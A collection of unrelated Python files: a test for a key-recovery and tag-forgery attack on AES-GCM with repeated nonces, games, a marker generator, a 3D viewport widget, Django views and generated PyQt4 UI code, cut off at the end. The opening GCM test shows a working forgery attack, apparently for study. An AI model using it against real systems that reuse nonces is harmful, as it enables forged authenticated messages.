assert polynomial_factors_product(factorization) == polynomial.monic()
def test_repeated_nonce():
print("Test Key-Recovery Attack on GCM with Repeated Nonces")
for _ in range(3):
nonce = random_bytes(12)
key = random_bytes(16)
h = bytes(AES.new(key, AES.MODE_ECB).encrypt(bytes(b'\x00'*16)))
h = aes_polynomial(h)
ciphertexts_additionals_tags = []
for _ in range(4):
plaintext = random_bytes(randint(0, 50))
additional = random_bytes(randint(0, 50))
ciphertext, tag = gcm_encrypt(plaintext, additional, key, nonce)
ciphertexts_additionals_tags.append((ciphertext, additional, tag))
valid_ciphertext, valid_additional, valid_tag = ciphertexts_additionals_tags[0]
auth_key_candidates = recover_key_repated_nonce(ciphertexts_additionals_tags)
assert h.to_bytes() in auth_key_candidates
# try found auth key candidates
correct_auth_key_found = False
for auth_key in auth_key_candidates:
forged_ciphertext = random_bytes(randint(0, 10))
forged_additional = random_bytes(randint(0, 10))
forged_tag = gcm_forge_tag(ciphertext=forged_ciphertext, additional=forged_additional, auth_key=auth_key,
valid_ciphertext=valid_ciphertext, valid_additional=valid_additional, valid_tag=valid_tag)
if gcm_verify(forged_tag, forged_ciphertext, forged_additional, key, nonce):
correct_auth_key_found = True
break
assert correct_auth_key_found
def run():
log.level = 'debug'
test_polynomials()
test_gcm()
test_factor()
test_repeated_nonce()
if __name__ == "__main__":
run()
|
#JO-KEN-PO
import time
import random
lista = ("PEDRA","PAPEL","TESOURA")
pcopcao = random.randint(0,2)
print('''Suas opções:
[ 0 ] PEDRA
[ 1 ] PAPEL
[ 2 ] TESOURA''')
opcao = int(input('Qual a sua jogada? '))
time.sleep(1)
print("JO")
time.sleep(1)
print("KEN")
time.sleep(1)
print("PO!")
time.sleep(1)
print('-='*15)
print('Computador jogou {}'.format(lista[pcopcao]))
print('Jogador jogou {}'.format(lista[opcao]))
print('-='*15)
if opcao == 0:
if pcopcao == 0:
print("EMPATE")
elif pcopcao == 1:
print("COMPUTADOR GANHOU")
elif pcopcao == 2:
print("JOGADOR GANHOU")
elif opcao == 1:
if pcopcao == 0:
print("JOGADOR GANHOU")
elif pcopcao == 1:
print("EMPATE")
elif pcopcao == 2:
print("COMPUTADOR GANHOU")
elif opcao == 2:
if pcopcao == 0:
print("COMPUTADOR GANHOU")
elif pcopcao == 1:
print("JOGADOR GANHOU")
elif pcopcao == 2:
print("EMPATE")
|
#!/usr/bin/env python3
"""Create an Aruco markers for testing.
It can create a single marker or a pair for easy testing.
"""
__author__ = "Steve Geyer"
__copyright__ = "Copyright 2019, Steve Geyer"
__credits__ = ["Steve Geyer"]
__license__ = "BSD 3-Clause License"
__version__ = "1.0.0"
__status__ = "Development"
import argparse
import matplotlib as mpl
import matplotlib.pyplot as plt
import cv2
from cv2 import aruco
def main():
"""Execute the command"""
aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)
fig = plt.figure()
parser = argparse.ArgumentParser(description='Create aruco fiducial markers')
parser.add_argument('-b', '--basename',
help='basename for file (an extension is added)',
required=False, default='marker')
parser.add_argument('-i', '--id', type=int, help='marker ID',
required=False, default=1)
parser.add_argument('-p', '--pair', help='create a pair of markers',
required=False, action='store_true')
args = parser.parse_args()
if not args.pair:
img = aruco.drawMarker(aruco_dict, args.id, 700)
filename = args.basename + '.png'
cv2.imwrite(filename, img)
print('Created ID %d marker into file %s' % (args.id, filename))
else:
ax = fig.add_subplot(1, 4, 1)
img = aruco.drawMarker(aruco_dict, args.id, 700)
plt.imshow(img, cmap=mpl.cm.gray, interpolation='nearest')
ax.axis('off')
ax = fig.add_subplot(1, 4, 4)
img = aruco.drawMarker(aruco_dict, args.id, 700)
plt.imshow(img, cmap=mpl.cm.gray, interpolation='nearest')
ax.axis('off')
filename = args.basename + '.pdf'
plt.savefig(filename)
print('Created pair of ID %d markers into file %s' % (args.id, filename))
if __name__ == "__main__":
main()
|
from PolyEdit3D.Widgets.PlyToolPanel import PlyViewportToolPanel, PlyBtnSetWireView, PlyBtnDrawPlaneByVector
from PolyEdit3D.GL.Renderer import PlyRenderer, PlyViewportCamera
from PolyEdit3D.GL.Elements import PlySceneAxisDots, PlySceneAxisLines, PlySceneGrid
from PolyEdit3D.GL.GeometryEngine import GeometryEngine, PlyEditEnum
from PolyEdit3D.GL.Elements.SceneElements.TMPPlane import TMPPlane
from OpenGL import GL as gl
from PySide2 import QtWidgets, QtCore, QtGui
class PlyViewportWidget(QtWidgets.QOpenGLWidget):
"""Main 3D scene viewer."""
def __init__(self):
super(PlyViewportWidget, self).__init__(parent=None)
# --- Setup widget attributes ---
self.setAttribute(QtCore.Qt.WA_Hover)
self.installEventFilter(self)
# -- Init viewport tool panel --
self.toolPanel = PlyViewportToolPanel(self)
# - Wireframe button setup -
self.btnWire = PlyBtnSetWireView(parent=self)
self.btnWire.clicked.connect(self.onGeoModeChanged)
self.btnPlnVec = PlyBtnDrawPlaneByVector(parent=self)
self.btnPlnVec.clicked.connect(self.onPlaneVecDrawStateChanged)
self.editState = PlyEditEnum.IDLE
self.geoEngine = GeometryEngine()
self.renderer = PlyRenderer()
self.camera = PlyViewportCamera()
self.grid = None
self.scene_dots = None
self.scene_lines = None
self.draw_list = list()
self.first_point = QtGui.QVector3D()
self.move_point = QtGui.QVector3D()
self.__initUI()
def __initUI(self):
"""Setup user interface inside the viewport."""
self.toolPanel.addButton(self.btnPlnVec, hasSpacer=True)
self.toolPanel.addButton(self.btnWire, hasSpacer=True)
self.setLayout(QtWidgets.QHBoxLayout())
self.layout().setAlignment(QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)
self.layout().addWidget(self.toolPanel)
def initializeGL(self):
self.renderer.clear()
self.grid = PlySceneGrid()
self.scene_dots = PlySceneAxisDots()
self.scene_lines = PlySceneAxisLines()
def paintGL(self):
self.renderer.init()
self.renderer.clear()
self.camera.updateCamera()
for obj in self.draw_list:
self.renderer.draw(obj, self.camera)
self.renderer.draw(self.grid, self.camera)
self.renderer.draw(self.scene_dots, self.camera, draw_type=gl.GL_POINTS)
self.renderer.draw(self.scene_lines, self.camera, draw_type=gl.GL_LINES)
def resizeGL(self, w: int, h: int):
self.camera.setProjection(w, h)
def eventFilter(self, watched: QtCore.QObject, event: QtCore.QEvent) -> bool:
if event.type() == QtCore.QEvent.HoverEnter:
self.setFocus()
elif event.type() == QtCore.QEvent:
self.clearFocus()
return super(PlyViewportWidget, self).eventFilter(watched, event)
def keyPressEvent(self, event: QtGui.QKeyEvent):
if event.key() == QtCore.Qt.Key_Shift:
self.camera.isPanEnabled = True
print(self.geoEngine.currentObject)
def keyReleaseEvent(self, event: QtGui.QKeyEvent):
if event.key() == QtCore.Qt.Key_Shift:
self.camera.isPanEnabled = False
def mousePressEvent(self, event: QtGui.QMouseEvent):
self.makeCurrent()
self.camera.mousePos = QtGui.QVector2D(event.localPos())
if event.buttons() == QtCore.Qt.RightButton and self.editState == PlyEditEnum.DRAW_PLANE:
click_pos = self.camera.getRayGridIntersecton(self.camera.mousePos)
self.geoEngine.startPoint = click_pos
self.geoEngine.movePoint = click_pos
self.geoEngine.setObject(TMPPlane())
self.geoEngine.setScaleByScalar(0.0)
self.geoEngine.setTranslationByVector(click_pos)
self.draw_list.append(self.geoEngine.currentObject)
self.update()
def mouseReleaseEvent(self, event: QtGui.QMouseEvent):
if event.button() == QtCore.Qt.RightButton and self.editState == PlyEditEnum.DRAW_PLANE:
self.geoEngine.releaseObject()
self.update()
def mouseMoveEvent(self, event: QtGui.QMouseEvent):
if event.buttons() == QtCore.Qt.RightButton and self.editState == PlyEditEnum.DRAW_PLANE:
self.geoEngine.planeFromVector(self.camera.getRayGridIntersecton(QtGui.QVector2D(event.localPos())))
if event.buttons() == QtCore.Qt.LeftButton:
self.camera.rotate(self.camera.mousePos, QtGui.QVector2D(event.localPos()))
self.camera.mousePos = QtGui.QVector2D(event.localPos())
if event.buttons() == QtCore.Qt.RightButton and self.camera.isPanEnabled:
self.camera.pan(self.camera.mousePos, QtGui.QVector2D(event.localPos()))
self.update()
def wheelEvent(self, event: QtGui.QWheelEvent):
self.camera.zoom(event.delta())
self.update()
# TODO: Draw wireframe as a texture
def onGeoModeChanged(self, ):
"""Action to perform on 'Wireframe' button click.
Change viewport's polygon mode fill."""
self.makeCurrent()
if not self.btnWire.isChecked():
gl.glPolygonMode(gl.GL_FRONT_AND_BACK, gl.GL_FILL)
self.update()
return
gl.glPolygonMode(gl.GL_FRONT_AND_BACK, gl.GL_LINE)
self.update()
def onPlaneVecDrawStateChanged(self):
if self.btnPlnVec.isChecked() and self.editState == PlyEditEnum.IDLE:
self.editState = PlyEditEnum.DRAW_PLANE
if not self.btnPlnVec.isChecked() and self.editState == PlyEditEnum.DRAW_PLANE:
self.editState = PlyEditEnum.IDLE
self.update()
|
class Solution:
@staticmethod
def search_matrix(matrix, target):
return Solution.upper_right_solution(matrix, target)
pass
@staticmethod
def simple_solution(matrix, target):
for row in matrix:
for item in row:
if item == target:
return True
return False
@staticmethod
def upper_right_solution(matrix, target):
"""
右上角元素为这一行最大,这一列最小,判断其与target大小
等于则返回,大于则删除此列,小于则删除此行
"""
row_index = 0
row_num = len(matrix)
if row_num == 0:
return False
column_index = len(matrix[0]) - 1
while row_index < row_num and column_index >= 0:
if matrix[row_index][column_index] == target:
return True
elif matrix[row_index][column_index] > target:
column_index -= 1
else:
row_index += 1
return False
if __name__ == '__main__':
m = [
[1, 4, 7, 11, 15],
[2, 5, 8, 12, 19],
[3, 6, 9, 16, 22],
[10, 13, 14, 17, 24],
[18, 21, 23, 26, 30]
]
t = 5
print(Solution.search_matrix(m, t))
|
from django.shortcuts import render, redirect
from django.urls import reverse
from django.views.generic import CreateView
from django.contrib import messages
from django.contrib.auth import login
from django.contrib.auth.decorators import login_required
from django.views.generic.detail import DetailView
from .models import Staff, User, StaffVerification
from .forms import (
UserRegistrationForm, TeacherSignUpForm,
StaffVerificationForm, StaffSignatureUpload
)
from activities.models import Transcript
from .utils import check_academicgroup_staff
# from activities.models import Request
# Create your views here.
def register(request):
form = UserRegistrationForm()
if request.method == 'POST':
form = UserRegistrationForm(request.POST or None)
if form.is_valid():
form.save()
return redirect('login')
context = {'form': form, 'title': 'Student'}
return render(request, 'registration/register.html', context=context)
class TeacherSignUpView(CreateView):
form_class = TeacherSignUpForm
model = User
template_name = 'registration/register.html'
def form_valid(self, form):
user = form.save()
# login(self.request, user)
message = "registration successful, please note that you won't be able to login to our site until you're" \
"Verified. Kindly follow the instructions set to your email address"
messages.success(self.request, message=message)
return redirect('homepage')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['title'] = 'Staff'
return context
class StaffVerificationView(CreateView, DetailView):
form_class = StaffVerificationForm
model = Staff
template_name = 'registration/staff_verify.html'
def form_valid(self, form):
staff = self.get_object()
form.save(staff)
return redirect('homepage')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
staff = self.get_object()
context["staff"] = staff
return context
def post(self, request, *args: str, **kwargs):
form = StaffVerificationForm(request.POST, request.FILES)
staff = self.get_object()
if form.is_valid():
form.save(staff=staff)
message = "verification items uploaded successfully, we will contact the admin to verify your account"\
". Thank you!"
messages.success(request, message)
return redirect("homepage")
@login_required
def profile(request):
# s_user_req means specific user requests which is all the request made
# by the currently logged in user
transcript = Transcript.objects.filter(request_by=request.user)
academic_office_staff = check_academicgroup_staff(request)
context = {
'specific': transcript,
'academic_office_staff': academic_office_staff
}
return render(request, 'profile.html', context=context)
@login_required
def upload_staff_signature(request):
if not request.user.is_teacher:
messages.info(request, "Only staffs are allowed to view this page.")
return redirect(reverse('login'))
form = StaffSignatureUpload(current_user=request.user)
if request.method == "POST":
form = StaffSignatureUpload(request.POST or None, request.FILES, current_user=request.user)
if form.is_valid():
form.save(commit=True)
messages.success(request, "signature uploaded successfully")
return redirect(reverse('user-profile'))
context = dict(form=form)
return render(request, 'profile/signature.html', context=context)
|
class Node:
def __init__(self, data):
"constructor to initiate this object"
# store data
self.val = data
# store reference (next item)
self.next = None
return
def has_value(self, value):
"method to compare the value with the node data"
if self.val == value: return True
else: return False
# A Linked List class with a single head node
class LinkedList:
def __init__(self):
self.head = None
# insertion method for the linked list
def insert(self, data):
newNode = Node(data)
if(self.head):
current = self.head
while(current.next):
current = current.next
current.next = newNode
else:
self.head = newNode
# print method for the linked list
def printLL(self):
current = self.head
list = []
while(current):
# print(current.val)
list.append(current.val)
current = current.next
print(list)
|
import re
nombres = ["Sandra López", "Antonio Gómez", "María López",
"Jara Martín", "Lara Pérez"]
[print(nombre, end="\n") for nombre in nombres if re.match(".ara", nombre)]
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\paul\Dropbox\Python\projects\Shape_Calculator\application\pyqt_ui\uiFormTabs.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(458, 630)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
MainWindow.setFont(font)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8("images/scLogolARGE.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout_14 = QtGui.QHBoxLayout()
self.horizontalLayout_14.setObjectName(_fromUtf8("horizontalLayout_14"))
self.label = QtGui.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.label.setObjectName(_fromUtf8("label"))
self.horizontalLayout_14.addWidget(self.label)
self.btnReset = QtGui.QPushButton(self.centralwidget)
self.btnReset.setMaximumSize(QtCore.QSize(150, 16777215))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(9)
self.btnReset.setFont(font)
self.btnReset.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.btnReset.setObjectName(_fromUtf8("btnReset"))
self.horizontalLayout_14.addWidget(self.btnReset)
self.verticalLayout.addLayout(self.horizontalLayout_14)
self.btnConversions = QtGui.QTabWidget(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(9)
self.btnConversions.setFont(font)
self.btnConversions.setLayoutDirection(QtCore.Qt.LeftToRight)
self.btnConversions.setTabPosition(QtGui.QTabWidget.North)
self.btnConversions.setTabShape(QtGui.QTabWidget.Rounded)
self.btnConversions.setElideMode(QtCore.Qt.ElideNone)
self.btnConversions.setObjectName(_fromUtf8("btnConversions"))
self.tabUnitConversion = QtGui.QWidget()
self.tabUnitConversion.setObjectName(_fromUtf8("tabUnitConversion"))
self.verticalLayout_6 = QtGui.QVBoxLayout(self.tabUnitConversion)
self.verticalLayout_6.setObjectName(_fromUtf8("verticalLayout_6"))
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.labelTitleConversion = QtGui.QLabel(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(14)
self.labelTitleConversion.setFont(font)
self.labelTitleConversion.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTitleConversion.setObjectName(_fromUtf8("labelTitleConversion"))
self.horizontalLayout_2.addWidget(self.labelTitleConversion)
self.verticalLayout_6.addLayout(self.horizontalLayout_2)
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.labelTitleTo = QtGui.QLabel(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(8)
self.labelTitleTo.setFont(font)
self.labelTitleTo.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTitleTo.setObjectName(_fromUtf8("labelTitleTo"))
self.gridLayout.addWidget(self.labelTitleTo, 0, 2, 1, 1)
self.labelTitleFrom = QtGui.QLabel(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(8)
self.labelTitleFrom.setFont(font)
self.labelTitleFrom.setStyleSheet(_fromUtf8("qproperty-alignment: AlignCenter;"))
self.labelTitleFrom.setObjectName(_fromUtf8("labelTitleFrom"))
self.gridLayout.addWidget(self.labelTitleFrom, 0, 1, 1, 1)
self.lineEditOutputVolume = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputVolume.setFont(font)
self.lineEditOutputVolume.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputVolume.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputVolume.setReadOnly(True)
self.lineEditOutputVolume.setObjectName(_fromUtf8("lineEditOutputVolume"))
self.gridLayout.addWidget(self.lineEditOutputVolume, 6, 3, 1, 1)
self.labelTitleVolume = QtGui.QLabel(self.tabUnitConversion)
self.labelTitleVolume.setObjectName(_fromUtf8("labelTitleVolume"))
self.gridLayout.addWidget(self.labelTitleVolume, 5, 0, 2, 1)
self.label_3 = QtGui.QLabel(self.tabUnitConversion)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 7, 0, 2, 1)
self.lineEditInputMassFlow = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputMassFlow.setFont(font)
self.lineEditInputMassFlow.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputMassFlow.setObjectName(_fromUtf8("lineEditInputMassFlow"))
self.gridLayout.addWidget(self.lineEditInputMassFlow, 11, 3, 1, 1)
self.lineEditOutputArea = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputArea.setFont(font)
self.lineEditOutputArea.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputArea.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputArea.setReadOnly(True)
self.lineEditOutputArea.setObjectName(_fromUtf8("lineEditOutputArea"))
self.gridLayout.addWidget(self.lineEditOutputArea, 4, 3, 1, 1)
self.lineEditOutputLength = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputLength.setFont(font)
self.lineEditOutputLength.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputLength.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputLength.setReadOnly(True)
self.lineEditOutputLength.setObjectName(_fromUtf8("lineEditOutputLength"))
self.gridLayout.addWidget(self.lineEditOutputLength, 2, 3, 1, 1)
self.lineEditInputArea = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputArea.setFont(font)
self.lineEditInputArea.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputArea.setObjectName(_fromUtf8("lineEditInputArea"))
self.gridLayout.addWidget(self.lineEditInputArea, 3, 3, 1, 1)
self.lineEditOutputMassFlow = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputMassFlow.setFont(font)
self.lineEditOutputMassFlow.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputMassFlow.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputMassFlow.setReadOnly(True)
self.lineEditOutputMassFlow.setObjectName(_fromUtf8("lineEditOutputMassFlow"))
self.gridLayout.addWidget(self.lineEditOutputMassFlow, 12, 3, 1, 1)
self.lineEditInputDensity = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputDensity.setFont(font)
self.lineEditInputDensity.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputDensity.setObjectName(_fromUtf8("lineEditInputDensity"))
self.gridLayout.addWidget(self.lineEditInputDensity, 9, 3, 1, 1)
self.lineEditOutputDensity = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputDensity.setFont(font)
self.lineEditOutputDensity.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputDensity.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputDensity.setReadOnly(True)
self.lineEditOutputDensity.setObjectName(_fromUtf8("lineEditOutputDensity"))
self.gridLayout.addWidget(self.lineEditOutputDensity, 10, 3, 1, 1)
self.lineEditInputVolume = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputVolume.setFont(font)
self.lineEditInputVolume.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputVolume.setObjectName(_fromUtf8("lineEditInputVolume"))
self.gridLayout.addWidget(self.lineEditInputVolume, 5, 3, 1, 1)
self.lineEditInputMass = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputMass.setFont(font)
self.lineEditInputMass.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputMass.setObjectName(_fromUtf8("lineEditInputMass"))
self.gridLayout.addWidget(self.lineEditInputMass, 7, 3, 1, 1)
self.labelTitleVelocity = QtGui.QLabel(self.tabUnitConversion)
self.labelTitleVelocity.setObjectName(_fromUtf8("labelTitleVelocity"))
self.gridLayout.addWidget(self.labelTitleVelocity, 11, 0, 2, 1)
self.label_4 = QtGui.QLabel(self.tabUnitConversion)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 9, 0, 2, 1)
self.labelTitleLength = QtGui.QLabel(self.tabUnitConversion)
self.labelTitleLength.setObjectName(_fromUtf8("labelTitleLength"))
self.gridLayout.addWidget(self.labelTitleLength, 1, 0, 2, 1)
self.labelTitleArea = QtGui.QLabel(self.tabUnitConversion)
self.labelTitleArea.setObjectName(_fromUtf8("labelTitleArea"))
self.gridLayout.addWidget(self.labelTitleArea, 3, 0, 2, 1)
self.lineEditOutputMass = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(11)
self.lineEditOutputMass.setFont(font)
self.lineEditOutputMass.setStyleSheet(_fromUtf8("background: rgb(229, 229, 229)"))
self.lineEditOutputMass.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditOutputMass.setReadOnly(True)
self.lineEditOutputMass.setObjectName(_fromUtf8("lineEditOutputMass"))
self.gridLayout.addWidget(self.lineEditOutputMass, 8, 3, 1, 1)
self.lineEditInputLength = QtGui.QLineEdit(self.tabUnitConversion)
font = QtGui.QFont()
font.setPointSize(11)
self.lineEditInputLength.setFont(font)
self.lineEditInputLength.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lineEditInputLength.setObjectName(_fromUtf8("lineEditInputLength"))
self.gridLayout.addWidget(self.lineEditInputLength, 1, 3, 1, 1)
self.comboBoxFromLength = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromLength.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromLength.setFont(font)
self.comboBoxFromLength.setObjectName(_fromUtf8("comboBoxFromLength"))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.comboBoxFromLength.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromLength, 1, 1, 2, 1)
self.comboBoxToLength = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToLength.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToLength.setFont(font)
self.comboBoxToLength.setObjectName(_fromUtf8("comboBoxToLength"))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.comboBoxToLength.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToLength, 1, 2, 2, 1)
self.comboBoxFromArea = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromArea.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromArea.setFont(font)
self.comboBoxFromArea.setObjectName(_fromUtf8("comboBoxFromArea"))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.comboBoxFromArea.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromArea, 3, 1, 2, 1)
self.comboBoxToLength_2 = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToLength_2.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToLength_2.setFont(font)
self.comboBoxToLength_2.setObjectName(_fromUtf8("comboBoxToLength_2"))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.comboBoxToLength_2.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToLength_2, 3, 2, 2, 1)
self.comboBoxFromVolume = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromVolume.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromVolume.setFont(font)
self.comboBoxFromVolume.setObjectName(_fromUtf8("comboBoxFromVolume"))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.comboBoxFromVolume.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxFromVolume, 5, 1, 2, 1)
self.comboBoxToVolume = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxToVolume.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxToVolume.setFont(font)
self.comboBoxToVolume.setObjectName(_fromUtf8("comboBoxToVolume"))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.comboBoxToVolume.addItem(_fromUtf8(""))
self.gridLayout.addWidget(self.comboBoxToVolume, 5, 2, 2, 1)
self.comboBoxFromMass = QtGui.QComboBox(self.tabUnitConversion)
self.comboBoxFromMass.setMaximumSize(QtCore.QSize(75, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
self.comboBoxFromMass.setFont(font)
self.comboBoxFromMass.setObjectName(_fromUtf8("comboBoxFromMass"))
self.comboBoxFromMass.addItem(_fromUtf8(""))
self.comboBoxFromMass.addItem(_fromUtf8(""))
self.comboBoxFromMass.addItem(_fromUtf8(""))
